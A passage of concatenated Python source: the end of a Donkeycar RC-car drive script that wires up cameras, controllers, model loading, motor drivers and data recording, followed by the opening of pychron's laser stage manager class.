threaded = True
if cfg.DONKEY_GYM:
from donkeycar.parts.dgym import DonkeyGymEnv
cam = DonkeyGymEnv(cfg.DONKEY_SIM_PATH, host=cfg.SIM_HOST, env_name=cfg.DONKEY_GYM_ENV_NAME, conf=cfg.GYM_CONF, delay=cfg.SIM_ARTIFICIAL_LATENCY)
threaded = True
inputs = ['angle', 'throttle']
elif cfg.CAMERA_TYPE == "PICAM":
from donkeycar.parts.camera import PiCamera
cam = PiCamera(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, framerate=cfg.CAMERA_FRAMERATE, vflip=cfg.CAMERA_VFLIP, hflip=cfg.CAMERA_HFLIP)
elif cfg.CAMERA_TYPE == "WEBCAM":
from donkeycar.parts.camera import Webcam
cam = Webcam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH)
elif cfg.CAMERA_TYPE == "CVCAM":
from donkeycar.parts.cv import CvCam
cam = CvCam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH)
elif cfg.CAMERA_TYPE == "CSIC":
from donkeycar.parts.camera import CSICamera
cam = CSICamera(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, framerate=cfg.CAMERA_FRAMERATE, gstreamer_flip=cfg.CSIC_CAM_GSTREAMER_FLIP_PARM)
elif cfg.CAMERA_TYPE == "V4L":
from donkeycar.parts.camera import V4LCamera
cam = V4LCamera(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, framerate=cfg.CAMERA_FRAMERATE)
elif cfg.CAMERA_TYPE == "MOCK":
from donkeycar.parts.camera import MockCamera
cam = MockCamera(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH)
elif cfg.CAMERA_TYPE == "IMAGE_LIST":
from donkeycar.parts.camera import ImageListCamera
cam = ImageListCamera(path_mask=cfg.PATH_MASK)
elif cfg.CAMERA_TYPE == "LEOPARD":
from donkeycar.parts.leopard_imaging import LICamera
cam = LICamera(width=cfg.IMAGE_W, height=cfg.IMAGE_H, fps=cfg.CAMERA_FRAMERATE)
else:
raise(Exception("Unknown camera type: %s" % cfg.CAMERA_TYPE))
V.add(cam, inputs=inputs, outputs=['cam/image_array'], threaded=threaded)
if use_joystick or cfg.USE_JOYSTICK_AS_DEFAULT:
#modify max_throttle closer to 1.0 to have more power
#modify steering_scale lower than 1.0 to have less responsive steering
if cfg.CONTROLLER_TYPE == "MM1":
from donkeycar.parts.robohat import RoboHATController
ctr = RoboHATController(cfg)
elif "custom" == cfg.CONTROLLER_TYPE:
#
# custom controller created with `donkey createjs` command
#
from my_joystick import MyJoystickController
ctr = MyJoystickController(
throttle_dir=cfg.JOYSTICK_THROTTLE_DIR,
throttle_scale=cfg.JOYSTICK_MAX_THROTTLE,
steering_scale=cfg.JOYSTICK_STEERING_SCALE,
auto_record_on_throttle=cfg.AUTO_RECORD_ON_THROTTLE)
ctr.set_deadzone(cfg.JOYSTICK_DEADZONE)
else:
from donkeycar.parts.controller import get_js_controller
ctr = get_js_controller(cfg)
if cfg.USE_NETWORKED_JS:
from donkeycar.parts.controller import JoyStickSub
netwkJs = JoyStickSub(cfg.NETWORK_JS_SERVER_IP)
V.add(netwkJs, threaded=True)
ctr.js = netwkJs
V.add(ctr,
inputs=['cam/image_array'],
outputs=['user/angle', 'user/throttle', 'user/mode', 'recording'],
threaded=True)
else:
#This web controller will create a web server that is capable
#of managing steering, throttle, and modes, and more.
ctr = LocalWebController(port=cfg.WEB_CONTROL_PORT, mode=cfg.WEB_INIT_MODE)
V.add(ctr,
inputs=['cam/image_array', 'tub/num_records'],
outputs=['user/angle', 'user/throttle', 'user/mode', 'recording'],
threaded=True)
#this throttle filter will allow one tap back for esc reverse
th_filter = ThrottleFilter()
V.add(th_filter, inputs=['user/throttle'], outputs=['user/throttle'])
#See if we should even run the pilot module.
#This is only needed because the part run_condition only accepts boolean
class PilotCondition:
def run(self, mode):
if mode == 'user':
return False
else:
return True
V.add(PilotCondition(), inputs=['user/mode'], outputs=['run_pilot'])
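# Drive the RGB status LED: a known track location or a model reload
# overrides the color; otherwise the returned blink rate reflects the
# record-count alerts, the behavior state, recording, and the drive mode.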
class LedConditionLogic:
def __init__(self, cfg):
self.cfg = cfg
def run(self, mode, recording, recording_alert, behavior_state, model_file_changed, track_loc):
#returns a blink rate. 0 for off. -1 for on. positive for rate.
if track_loc is not None:
led.set_rgb(*self.cfg.LOC_COLORS[track_loc])
return -1
if model_file_changed:
led.set_rgb(self.cfg.MODEL_RELOADED_LED_R, self.cfg.MODEL_RELOADED_LED_G, self.cfg.MODEL_RELOADED_LED_B)
return 0.1
else:
led.set_rgb(self.cfg.LED_R, self.cfg.LED_G, self.cfg.LED_B)
if recording_alert:
led.set_rgb(*recording_alert)
return self.cfg.REC_COUNT_ALERT_BLINK_RATE
else:
led.set_rgb(self.cfg.LED_R, self.cfg.LED_G, self.cfg.LED_B)
if behavior_state is not None and model_type == 'behavior':
r, g, b = self.cfg.BEHAVIOR_LED_COLORS[behavior_state]
led.set_rgb(r, g, b)
return -1 #solid on
if recording:
return -1 #solid on
elif mode == 'user':
return 1
elif mode == 'local_angle':
return 0.5
elif mode == 'local':
return 0.1
return 0
if cfg.HAVE_RGB_LED and not cfg.DONKEY_GYM:
from donkeycar.parts.led_status import RGB_LED
led = RGB_LED(cfg.LED_PIN_R, cfg.LED_PIN_G, cfg.LED_PIN_B, cfg.LED_INVERT)
led.set_rgb(cfg.LED_R, cfg.LED_G, cfg.LED_B)
V.add(LedConditionLogic(cfg), inputs=['user/mode', 'recording', "records/alert", 'behavior/state', 'modelfile/modified', "pilot/loc"],
outputs=['led/blink_rate'])
V.add(led, inputs=['led/blink_rate'])
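# Map the record count to an alert color: the last threshold in
# cfg.RECORD_ALERT_COLOR_ARR that num_records has reached wins.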
def get_record_alert_color(num_records):
col = (0, 0, 0)
for count, color in cfg.RECORD_ALERT_COLOR_ARR:
if num_records >= count:
col = color
return col
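# Prints progress every 10 records and returns an alert color for a number
# of loop cycles each time the count crosses a multiple of
# cfg.REC_COUNT_ALERT; the circle button can force an alert via force_alert.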
class RecordTracker:
def __init__(self):
self.last_num_rec_print = 0
self.dur_alert = 0
self.force_alert = 0
def run(self, num_records):
if num_records is None:
return 0
if self.last_num_rec_print != num_records or self.force_alert:
self.last_num_rec_print = num_records
if num_records % 10 == 0:
print("recorded", num_records, "records")
if num_records % cfg.REC_COUNT_ALERT == 0 or self.force_alert:
self.dur_alert = num_records // cfg.REC_COUNT_ALERT * cfg.REC_COUNT_ALERT_CYC
self.force_alert = 0
if self.dur_alert > 0:
self.dur_alert -= 1
if self.dur_alert != 0:
return get_record_alert_color(num_records)
return 0
rec_tracker_part = RecordTracker()
V.add(rec_tracker_part, inputs=["tub/num_records"], outputs=['records/alert'])
if cfg.AUTO_RECORD_ON_THROTTLE and isinstance(ctr, JoystickController):
#then we are not using the circle button. hijack that to force a record count indication
def show_record_count_status():
rec_tracker_part.last_num_rec_print = 0
rec_tracker_part.force_alert = 1
ctr.set_button_down_trigger('circle', show_record_count_status)
#Sombrero
if cfg.HAVE_SOMBRERO:
from donkeycar.parts.sombrero import Sombrero
s = Sombrero()
#IMU
if cfg.HAVE_IMU:
from donkeycar.parts.imu import IMU
imu = IMU(sensor=cfg.IMU_SENSOR, dlp_setting=cfg.IMU_DLP_CONFIG)
V.add(imu, outputs=['imu/acl_x', 'imu/acl_y', 'imu/acl_z',
'imu/gyr_x', 'imu/gyr_y', 'imu/gyr_z'], threaded=True)
# Use the FPV preview, which will show the cropped image output, or the full frame.
if cfg.USE_FPV:
V.add(WebFpv(), inputs=['cam/image_array'], threaded=True)
import threading
import functools
mutex=threading.Lock()
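# Simple mutex-guarded value holders shared between the joystick button
# callbacks below and the delayed behavior-state reset.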
class BoolProxy:
def __init__( self ):
self.myvar = False
def get( self ):
tmp = False
mutex.acquire()
tmp = self.myvar
mutex.release()
return tmp
def set( self, newValue ):
mutex.acquire()
self.myvar = newValue
mutex.release()
class FloatProxy:
def __init__( self ):
self.myvar = 0
def get( self ):
tmp = False
mutex.acquire()
tmp = self.myvar
mutex.release()
return tmp
def set( self, newValue ):
mutex.acquire()
self.myvar = newValue
mutex.release()
isEvent=BoolProxy()
timer=FloatProxy()
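# Decorator that runs the wrapped function on a background thread after
# `delay` seconds. The Event is never set, so waiter.wait(delay) simply acts
# as a sleep that does not block the vehicle loop.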
class Delayed(object):
def __init__(self, delay):
self.delay = delay
def __call__(self, func):
waiter = threading.Event()
@functools.wraps(func)
def wrapper(*args, **kwargs):
def _run():
waiter.wait(self.delay)
func(*args, **kwargs)
t = threading.Thread(target=_run)
t.start()
return wrapper
# flag=False
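# Debounce for the behavior buttons: the first press sets the requested
# state and schedules defaultState; additional presses while active extend
# the delay via the timer; once the timer drains, the state falls back to 1.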
@Delayed(0.25)
def defaultState(bh,isEvent):
if(timer.get()>0):
timer.set(timer.get()-1)
defaultState(bh,isEvent)
return
bh.set_state(1)
# bh.set_state(3)
isEvent.set(False)
def setStateLeft(x,bh,isEvent):
if(not isEvent.get()):
isEvent.set(True)
bh.set_state(x)
defaultState(bh,isEvent)
else:
timer.set(timer.get()+1)
# ctr.set_axis_trigger("dpad_up_down",ctr.set_throttle)
#Behavioral state
if cfg.TRAIN_BEHAVIORS:
bh = BehaviorPart(cfg.BEHAVIOR_LIST)
V.add(bh, outputs=['behavior/state', 'behavior/label', "behavior/one_hot_state_array"])
# bh.set_state(3)
bh.set_state(1)
try:
ctr.set_button_down_trigger('L1', lambda X=0:setStateLeft(X,bh,isEvent))
ctr.set_button_down_trigger('R1', lambda X=2:setStateLeft(X,bh,isEvent))
# ctr.set_button_down_trigger('X', lambda X=1:setStateLeft(X,bh,isEvent))
except Exception:
pass
inputs = ['cam/image_array', "behavior/one_hot_state_array"]
#IMU
elif model_type == "imu":
assert(cfg.HAVE_IMU)
#Run the pilot if the mode is not user.
inputs=['cam/image_array',
'imu/acl_x', 'imu/acl_y', 'imu/acl_z',
'imu/gyr_x', 'imu/gyr_y', 'imu/gyr_z']
else:
inputs=['cam/image_array']
def load_model(kl, model_path):
start = time.time()
print('loading model', model_path)
kl.load(model_path)
print('finished loading in %s sec.' % (str(time.time() - start)) )
def load_weights(kl, weights_path):
start = time.time()
try:
print('loading model weights', weights_path)
kl.model.load_weights(weights_path)
print('finished loading in %s sec.' % (str(time.time() - start)) )
except Exception as e:
print(e)
print('ERR>> problems loading weights', weights_path)
def load_model_json(kl, json_fnm):
start = time.time()
print('loading model json', json_fnm)
from tensorflow.python import keras
try:
with open(json_fnm, 'r') as handle:
contents = handle.read()
kl.model = keras.models.model_from_json(contents)
print('finished loading json in %s sec.' % (str(time.time() - start)) )
except Exception as e:
print(e)
print("ERR>> problems loading model json", json_fnm)
if model_path:
#When we have a model, first create an appropriate Keras part
kl = dk.utils.get_model_by_type(model_type, cfg,ctr)
model_reload_cb = None
if '.h5' in model_path or '.uff' in model_path or 'tflite' in model_path or '.pkl' in model_path:
#when we have a .h5 extension
#load everything from the model file
load_model(kl, model_path)
def reload_model(filename):
load_model(kl, filename)
model_reload_cb = reload_model
elif '.json' in model_path:
#when we have a .json extension
#load the model from there and look for a matching
#.wts file with just weights
load_model_json(kl, model_path)
weights_path = model_path.replace('.json', '.weights')
load_weights(kl, weights_path)
def reload_weights(filename):
weights_path = filename.replace('.json', '.weights')
load_weights(kl, weights_path)
model_reload_cb = reload_weights
else:
print("ERR>> Unknown extension type on model file!!")
return
#this part will signal visual LED, if connected
V.add(FileWatcher(model_path, verbose=True), outputs=['modelfile/modified'])
#these parts will reload the model file, but only when ai is running so we don't interrupt user driving
V.add(FileWatcher(model_path), outputs=['modelfile/dirty'], run_condition="ai_running")
V.add(DelayedTrigger(100), inputs=['modelfile/dirty'], outputs=['modelfile/reload'], run_condition="ai_running")
V.add(TriggeredCallback(model_path, model_reload_cb), inputs=["modelfile/reload"], run_condition="ai_running")
outputs=['pilot/angle', 'pilot/throttle']
if cfg.TRAIN_LOCALIZER:
outputs.append("pilot/loc")
V.add(kl, inputs=inputs,
outputs=outputs,
run_condition='run_pilot')
if cfg.STOP_SIGN_DETECTOR:
from donkeycar.parts.object_detector.stop_sign_detector import StopSignDetector
V.add(StopSignDetector(cfg.STOP_SIGN_MIN_SCORE, cfg.STOP_SIGN_SHOW_BOUNDING_BOX), inputs=['cam/image_array', 'pilot/throttle'], outputs=['pilot/throttle', 'cam/image_array'])
#Choose what inputs should change the car.
class DriveMode:
def run(self, mode,
user_angle, user_throttle,
pilot_angle, pilot_throttle):
if mode == 'user':
return user_angle, user_throttle
elif mode == 'local_angle':
return pilot_angle if pilot_angle else 0.0, user_throttle
else:
return pilot_angle if pilot_angle else 0.0, pilot_throttle * cfg.AI_THROTTLE_MULT if pilot_throttle else 0.0
V.add(DriveMode(),
inputs=['user/mode', 'user/angle', 'user/throttle',
'pilot/angle', 'pilot/throttle'],
outputs=['angle', 'throttle'])
#to give the car a boost when starting ai mode in a race.
aiLauncher = AiLaunch(cfg.AI_LAUNCH_DURATION, cfg.AI_LAUNCH_THROTTLE, cfg.AI_LAUNCH_KEEP_ENABLED)
V.add(aiLauncher,
inputs=['user/mode', 'throttle'],
outputs=['throttle'])
if isinstance(ctr, JoystickController):
ctr.set_button_down_trigger(cfg.AI_LAUNCH_ENABLE_BUTTON, aiLauncher.enable_ai_launch)
class AiRunCondition:
'''
A bool part to let us know when ai is running.
'''
def run(self, mode):
if mode == "user":
return False
return True
V.add(AiRunCondition(), inputs=['user/mode'], outputs=['ai_running'])
#Ai Recording
class AiRecordingCondition:
'''
Return True when in AI mode, otherwise respect the user-mode recording flag.
'''
def run(self, mode, recording):
if mode == 'user':
return recording
return True
if cfg.RECORD_DURING_AI:
V.add(AiRecordingCondition(), inputs=['user/mode', 'recording'], outputs=['recording'])
#Drive train setup
if cfg.DONKEY_GYM or cfg.DRIVE_TRAIN_TYPE == "MOCK":
pass
elif cfg.DRIVE_TRAIN_TYPE == "SERVO_ESC":
from donkeycar.parts.actuator import PCA9685, PWMSteering, PWMThrottle
steering_controller = PCA9685(cfg.STEERING_CHANNEL, cfg.PCA9685_I2C_ADDR, busnum=cfg.PCA9685_I2C_BUSNUM)
steering = PWMSteering(controller=steering_controller,
left_pulse=cfg.STEERING_LEFT_PWM,
right_pulse=cfg.STEERING_RIGHT_PWM)
throttle_controller = PCA9685(cfg.THROTTLE_CHANNEL, cfg.PCA9685_I2C_ADDR, busnum=cfg.PCA9685_I2C_BUSNUM)
throttle = PWMThrottle(controller=throttle_controller,
max_pulse=cfg.THROTTLE_FORWARD_PWM,
zero_pulse=cfg.THROTTLE_STOPPED_PWM,
min_pulse=cfg.THROTTLE_REVERSE_PWM)
V.add(steering, inputs=['angle'], threaded=True)
V.add(throttle, inputs=['throttle'], threaded=True)
elif cfg.DRIVE_TRAIN_TYPE == "DC_STEER_THROTTLE":
from donkeycar.parts.actuator import Mini_HBridge_DC_Motor_PWM
steering = Mini_HBridge_DC_Motor_PWM(cfg.HBRIDGE_PIN_LEFT, cfg.HBRIDGE_PIN_RIGHT)
throttle = Mini_HBridge_DC_Motor_PWM(cfg.HBRIDGE_PIN_FWD, cfg.HBRIDGE_PIN_BWD)
V.add(steering, inputs=['angle'])
V.add(throttle, inputs=['throttle'])
elif cfg.DRIVE_TRAIN_TYPE == "DC_TWO_WHEEL":
from donkeycar.parts.actuator import TwoWheelSteeringThrottle, Mini_HBridge_DC_Motor_PWM
left_motor = Mini_HBridge_DC_Motor_PWM(cfg.HBRIDGE_PIN_LEFT_FWD, cfg.HBRIDGE_PIN_LEFT_BWD)
right_motor = Mini_HBridge_DC_Motor_PWM(cfg.HBRIDGE_PIN_RIGHT_FWD, cfg.HBRIDGE_PIN_RIGHT_BWD)
two_wheel_control = TwoWheelSteeringThrottle()
V.add(two_wheel_control,
inputs=['throttle', 'angle'],
outputs=['left_motor_speed', 'right_motor_speed'])
V.add(left_motor, inputs=['left_motor_speed'])
V.add(right_motor, inputs=['right_motor_speed'])
elif cfg.DRIVE_TRAIN_TYPE == "SERVO_HBRIDGE_PWM":
from donkeycar.parts.actuator import ServoBlaster, PWMSteering
steering_controller = ServoBlaster(cfg.STEERING_CHANNEL) #really pin
#PWM pulse values should be in the range of 100 to 200
assert(cfg.STEERING_LEFT_PWM <= 200)
assert(cfg.STEERING_RIGHT_PWM <= 200)
steering = PWMSteering(controller=steering_controller,
left_pulse=cfg.STEERING_LEFT_PWM,
right_pulse=cfg.STEERING_RIGHT_PWM)
from donkeycar.parts.actuator import Mini_HBridge_DC_Motor_PWM
motor = Mini_HBridge_DC_Motor_PWM(cfg.HBRIDGE_PIN_FWD, cfg.HBRIDGE_PIN_BWD)
V.add(steering, inputs=['angle'], threaded=True)
V.add(motor, inputs=["throttle"])
elif cfg.DRIVE_TRAIN_TYPE == "MM1":
from donkeycar.parts.robohat import RoboHATDriver
V.add(RoboHATDriver(cfg), inputs=['angle', 'throttle'])
elif cfg.DRIVE_TRAIN_TYPE == "PIGPIO_PWM":
from donkeycar.parts.actuator import PWMSteering, PWMThrottle, PiGPIO_PWM
steering_controller = PiGPIO_PWM(cfg.STEERING_PWM_PIN, freq=cfg.STEERING_PWM_FREQ, inverted=cfg.STEERING_PWM_INVERTED)
steering = PWMSteering(controller=steering_controller,
left_pulse=cfg.STEERING_LEFT_PWM,
right_pulse=cfg.STEERING_RIGHT_PWM)
throttle_controller = PiGPIO_PWM(cfg.THROTTLE_PWM_PIN, freq=cfg.THROTTLE_PWM_FREQ, inverted=cfg.THROTTLE_PWM_INVERTED)
throttle = PWMThrottle(controller=throttle_controller,
max_pulse=cfg.THROTTLE_FORWARD_PWM,
zero_pulse=cfg.THROTTLE_STOPPED_PWM,
min_pulse=cfg.THROTTLE_REVERSE_PWM)
V.add(steering, inputs=['angle'], threaded=True)
V.add(throttle, inputs=['throttle'], threaded=True)
# OLED setup
if cfg.USE_SSD1306_128_32:
from donkeycar.parts.oled import OLEDPart
auto_record_on_throttle = cfg.USE_JOYSTICK_AS_DEFAULT and cfg.AUTO_RECORD_ON_THROTTLE
oled_part = OLEDPart(cfg.SSD1306_128_32_I2C_BUSNUM, auto_record_on_throttle=auto_record_on_throttle)
V.add(oled_part, inputs=['recording', 'tub/num_records', 'user/mode'], outputs=[], threaded=True)
#add tub to save data
inputs=['cam/image_array',
'user/angle', 'user/throttle',
'user/mode']
types=['image_array',
'float', 'float',
'str']
if cfg.TRAIN_BEHAVIORS:
inputs += ['behavior/state', 'behavior/label', "behavior/one_hot_state_array"]
types += ['int', 'str', 'vector']
if cfg.CAMERA_TYPE == "D435" and cfg.REALSENSE_D435_DEPTH:
inputs += ['cam/depth_array']
types += ['gray16_array']
if cfg.HAVE_IMU or (cfg.CAMERA_TYPE == "D435" and cfg.REALSENSE_D435_IMU):
inputs += ['imu/acl_x', 'imu/acl_y', 'imu/acl_z',
'imu/gyr_x', 'imu/gyr_y', 'imu/gyr_z']
types +=['float', 'float', 'float',
'float', 'float', 'float']
if cfg.RECORD_DURING_AI:
inputs += ['pilot/angle', 'pilot/throttle']
types += ['float', 'float']
if cfg.HAVE_PERFMON:
from donkeycar.parts.perfmon import PerfMonitor
mon = PerfMonitor(cfg)
perfmon_outputs = ['perf/cpu', 'perf/mem', 'perf/freq']
inputs += perfmon_outputs
types += ['float', 'float', 'float']
V.add(mon, inputs=[], outputs=perfmon_outputs, threaded=True)
# Decide whether to store new records in their own directory or append to the existing one.
tub_path = TubHandler(path=cfg.DATA_PATH).create_tub_path() if \
cfg.AUTO_CREATE_NEW_TUB else cfg.DATA_PATH
tub_writer = TubWriter(tub_path, inputs=inputs, types=types, metadata=meta)
V.add(tub_writer, inputs=inputs, outputs=["tub/num_records"], run_condition='recording')
# Telemetry (publish the same metrics that were added to the tub writer above)
if cfg.HAVE_MQTT_TELEMETRY:
from donkeycar.parts.telemetry import MqttTelemetry
published_inputs, published_types = MqttTelemetry.filter_supported_metrics(inputs, types)
tel = MqttTelemetry(cfg, default_inputs=published_inputs, default_types=published_types)
V.add(tel, inputs=published_inputs, outputs=["tub/queue_size"], threaded=True)
if cfg.PUB_CAMERA_IMAGES:
from donkeycar.parts.network import TCPServeValue
from donkeycar.parts.image import ImgArrToJpg
pub = TCPServeValue("camera")
V.add(ImgArrToJpg(), inputs=['cam/image_array'], outputs=['jpg/bin'])
V.add(pub, inputs=['jpg/bin'])
if type(ctr) is LocalWebController:
if cfg.DONKEY_GYM:
print("You can now go to http://localhost:%d to drive your car." % cfg.WEB_CONTROL_PORT)
else:
print("You can now go to <your hostname.local>:%d to drive your car." % cfg.WEB_CONTROL_PORT)
elif isinstance(ctr, JoystickController):
print("You can now move your joystick to drive your car.")
ctr.set_tub(tub_writer.tub)
ctr.print_controls()
#run the vehicle loop at DRIVE_LOOP_HZ until MAX_LOOPS is reached (if set) or the process is interrupted
V.start(rate_hz=cfg.DRIVE_LOOP_HZ, max_loop_count=cfg.MAX_LOOPS)
if __name__ == '__main__':
args = docopt(__doc__)
cfg = dk.load_config(myconfig=args['--myconfig'])
if args['drive']:
model_type = args['--type']
camera_type = args['--camera']
drive(cfg, model_path=args['--model'], use_joystick=args['--js'],
model_type=model_type, camera_type=camera_type,
meta=args['--meta'])
elif args['train']:
print('Use python train.py instead.\n')
|
stage_manager.py
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import os
import time
from numpy import array, asarray
# =============enthought library imports=======================
from traits.api import DelegatesTo, Instance, \
Button, List, String, Event, Bool
from pychron.canvas.canvas2D.laser_tray_canvas import LaserTrayCanvas
from pychron.core.geometry.convex_hull import convex_hull
from pychron.core.geometry.geometry import sort_clockwise
from pychron.core.geometry.polygon_offset import polygon_offset
from pychron.core.helpers.filetools import add_extension
from pychron.core.helpers.strtools import csv_to_floats
from pychron.core.ui.preference_binding import bind_preference, ColorPreferenceBinding
from pychron.core.ui.thread import Thread
from pychron.experiment.utilities.position_regex import POINT_REGEX, XY_REGEX, TRANSECT_REGEX
from pychron.hardware.motion_controller import MotionController, \
TargetPositionError, ZeroDisplacementException
from pychron.lasers.points.points_programmer import PointsProgrammer
from pychron.managers.motion_controller_managers.motion_controller_manager \
import MotionControllerManager
from pychron.paths import paths
from pychron.stage.stage_manager import BaseStageManager
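# Return True when p1 is farther than tol from p2 (or when p2 is unknown);
# used to decide whether the cached current hole needs to be recomputed.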
def distance_threshold(p1, p2, tol):
if p2 is None:
return True
x1, y1 = p1
x2, y2 = p2
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5 > tol
class StageManager(BaseStageManager):
"""
"""
stage_controller_klass = String('Newport')
stage_controller = Instance(MotionController)
points_programmer = Instance(PointsProgrammer)
motion_controller_manager = Instance(MotionControllerManager)
# canvas = Instance(LaserTrayCanvas)
simulation = DelegatesTo('stage_controller')
# stage_map_klass = StageMap
# _stage_map = Instance(StageMap)
# stage_map = Property(depends_on='_stage_map')
# stage_maps = Property(depends_on='_stage_maps')
# _stage_maps = List
# ===========================================================================
# buttons
# ===========================================================================
home = Button('home')
home_option = String('Home All')
home_options = List
manual_override_position_button = Event
ejoystick = Event
joystick_label = String('Enable Joystick')
joystick = Bool(False)
joystick_timer = None
back_button = Button
stop_button = Button('Stop')
_default_z = 0
_cached_position = None
_cached_current_hole = None
_homing = False
def __init__(self, *args, **kw):
"""
"""
super(StageManager, self).__init__(*args, **kw)
self.stage_controller = self._stage_controller_factory()
def measure_grain_polygon(self):
pass
def stop_measure_grain_polygon(self):
pass
def shutdown(self):
self._save_stage_map()
def create_device(self, *args, **kw):
dev = super(StageManager, self).create_device(*args, **kw)
dev.parent = self
return dev
def goto_position(self, v, **kw):
if XY_REGEX[0].match(v):
self._move_to_calibrated_position(v)
elif POINT_REGEX.match(v) or TRANSECT_REGEX[0].match(v):
self.move_to_point(v)
else:
self.move_to_hole(v, user_entry=True, **kw)
def get_current_position(self, **kw):
if self.stage_controller:
x = self.stage_controller.x
y = self.stage_controller.y
return x, y
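# Only re-query the stage map for the hole under the current position when
# the stage has moved more than a quarter of the hole dimension since the
# last lookup.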
def get_current_hole(self):
pos = self.get_current_position()
if self.stage_map:
if distance_threshold(pos, self._cached_position, self.stage_map.g_dimension / 4):
h = self.get_calibrated_hole(*pos, tol=self.stage_map.g_dimension / 2.)
if h is not None:
self._cached_current_hole = h
self._cached_position = pos
return self._cached_current_hole
def is_auto_correcting(self):
return False
def bind_preferences(self, pref_id):
bind_preference(self.canvas, 'show_grids', '{}.show_grids'.format(pref_id))
self.canvas.change_grid_visibility()
bind_preference(self.canvas, 'show_laser_position', '{}.show_laser_position'.format(pref_id))
bind_preference(self.canvas, 'show_desired_position', '{}.show_desired_position'.format(pref_id))
bind_preference(self.canvas, 'desired_position_color', '{}.desired_position_color'.format(pref_id),
factory=ColorPreferenceBinding)
# bind_preference(self.canvas, 'render_map', '{}.render_map'.format(pref_id))
#
bind_preference(self.canvas, 'crosshairs_kind', '{}.crosshairs_kind'.format(pref_id))
for tag in ('', 'aux_'):
for key in ('line_width', 'color', 'radius', 'offsetx', 'offsety'):
key = '{}crosshairs_{}'.format(tag, key)
factory = ColorPreferenceBinding if key.endswith('color') else None
pref = '{}.{}'.format(pref_id, key)
bind_preference(self.canvas, key, pref, factory=factory)
# bind_preference(self.canvas, '{}crosshairs_line_width', '{}.{}crosshairs_line_width'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_color',
# '{}.crosshairs_color'.format(pref_id),
# factory=ColorPreferenceBinding)
# bind_preference(self.canvas, 'crosshairs_radius', '{}.crosshairs_radius'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_offsetx', '{}.crosshairs_offsetx'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_offsety', '{}.crosshairs_offsety'.format(pref_id))
bind_preference(self.canvas, 'show_hole_label', '{}.show_hole_label'.format(pref_id))
bind_preference(self.canvas, 'hole_label_color', '{}.hole_label_color'.format(pref_id))
bind_preference(self.canvas, 'hole_label_size', '{}.hole_label_size'.format(pref_id))
self.canvas.handle_hole_label_size(self.canvas.hole_label_size)
bind_preference(self.canvas, 'scaling', '{}.scaling'.format(pref_id))
bind_preference(self.canvas, 'show_bounds_rect',
'{}.show_bounds_rect'.format(pref_id))
self.canvas.request_redraw()
def load(self):
super(StageManager, self).load()
config = self.get_configuration()
if config:
self._default_z = self.config_get(config, 'Defaults', 'z', default=13, cast='float')
self.points_programmer.load_stage_map(self.stage_map_name)
# load the calibration file
# should have calibration files for each stage map
self.tray_calibration_manager.load_calibration()
def finish_loading(self):
self.initialize_stage()
def initialize_stage(self):
self.update_axes()
axes = self.stage_controller.axes
self.home_options = ['Home All', 'XY'] + sorted([axes[a].name.upper() for a in axes])
self.canvas.parent = self
def save_calibration(self, name):
self.tray_calibration_manager.save_calibration(name=name)
# def add_stage_map(self, v):
# sm = self.stage_map_klass(file_path=v)
# psm = self._get_stage_map_by_name(sm.name)
# if psm:
# self._stage_maps.remove(psm)
# self._stage_maps.append(sm)
def accept_point(self):
self.points_programmer.accept_point()
def set_stage_map(self, v):
return self._set_stage_map(v)
def single_axis_move(self, *args, **kw):
return self.stage_controller.single_axis_move(*args, **kw)
def linear_move(self, x, y, use_calibration=True, check_moving=False, abort_if_moving=False, **kw):
if check_moving:
if self.moving():
self.warning('MotionController already in motion')
if abort_if_moving:
self.warning('Move to {},{} aborted'.format(x, y))
return
else:
self.stop()
self.debug('Motion stopped. moving to {},{}'.format(x, y))
pos = (x, y)
if use_calibration:
pos = self.get_calibrated_position(pos)
f = lambda x: '{:0.5f},{:0.5f}'.format(*x)
self.debug('%%%%%%%%%%%%%%%%% mapped {} to {}'.format(f((x, y)), f(pos)))
self.stage_controller.linear_move(*pos, **kw)
def move_to_hole(self, hole, **kw):
if self.stage_map.check_valid_hole(hole, **kw):
self._move(self._move_to_hole, hole, name='move_to_hole', **kw)
def move_to_point(self, pt):
self._move(self._move_to_point, pt, name='move_to_point')
def move_polyline(self, line):
self._move(self._move_to_line, line, name='move_to_line')
def move_polygon(self, poly):
self._move(self._move_polygon, poly, name='move_polygon')
def drill_point(self, pt):
self._move(self._drill_point, pt, name='drill_point')
def set_x(self, value, **kw):
return self.stage_controller.single_axis_move('x', value, **kw)
def set_y(self, value, **kw):
return self.stage_controller.single_axis_move('y', value, **kw)
def set_z(self, value, **kw):
return self.stage_controller.single_axis_move('z', value, **kw)
def set_xy(self, x, y, **kw):
hole = self._get_hole_by_position(x, y)
if hole:
self.move_to_hole(hole)
# self._set_hole(hole.id)
# self.move_to_hole(hole.id)
# self._set_hole(hole.id)
else:
return self.linear_move(x, y, **kw)
def get_hole(self, name):
if self.stage_map:
return self.stage_map.get_hole(name)
def move_to_load_position(self):
"""
"""
x, y, z = self.stage_controller.get_load_position()
self.info('moving to load position, x={}, y={}, z={}'.format(x, y, z))
self.stage_controller.linear_move(x, y, grouped_move=False, block=False)
self.stage_controller.set_z(z)
self.stage_controller.block()
def stop(self, ax_key=None, verbose=False):
self._stop(ax_key, verbose)
def relative_move(self, *args, **kw):
self.stage_controller.relative_move(*args, **kw)
def key_released(self):
sc = self.stage_controller
